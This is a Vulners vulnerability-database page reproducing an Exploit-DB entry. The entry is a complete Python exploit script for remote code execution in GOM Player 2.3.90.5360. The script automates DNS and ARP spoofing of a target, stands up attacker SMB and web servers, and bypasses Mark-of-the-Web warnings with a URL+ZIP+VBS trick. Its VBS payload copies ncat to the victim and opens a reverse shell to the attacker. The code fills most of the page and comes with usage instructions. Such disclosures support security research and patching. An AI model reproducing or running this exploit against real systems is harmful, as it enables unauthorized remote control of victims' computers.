Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

🗓️ 08 Sep 2023 00:00:00Reported by M. Akil GündoğanType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 449 Views

GOM Player 2.3.90.5360 - Remote Code Execution (RCE) enables attackers to execute code on the target by exploiting the insecure HTTP connection in the IE component, impacting millions of users worldwide. The exploit allows redirecting victims to a page created with DNS spoofing and executing code

Code
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360 
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8

# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.

# Vulnerability Description: 
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the 
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. 

# Full disclosure, developers should be more careful about software security.

# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.

# Some spaghetti and a bad code but it works :)

banner = """\033[38;5;196m+-----------------------------------------------------------+
|     GOM Player 2.3.90.5360 - Remote Code Execution        |
|   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
+-----------------------------------------------------------+\033[0m""" +""" 
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""

import time,os,zipfile,subprocess,socket,sys

print(banner)

if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)

targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")

def fCreate(fileName,fileContent): # File create func. 
    f = open(fileName,"w")
    f.write(fileContent)
    f.close()    

gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) 

print("\n[*]- Stage 1: Downloading neccesary tools...")

smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print("    [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print("    [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print("    [*] - DNSSpoof.py has been downloaded.")

print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability. 

smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP

print("[*]- Stage 3: Creating Attacker Web Page...")

# change this (optional) 
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> 
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""

fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell") 
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)

urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability. 
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")  

with zipfile.ZipFile(zipName, "w") as malzip:
    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))

print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's neccesary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... 
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Sep 2023 00:00Current
7High risk
Vulners AI Score7
gom playerremote code executioninsecure http connectionie vulnerabilitydns spoofingexploit usagesoftware security
449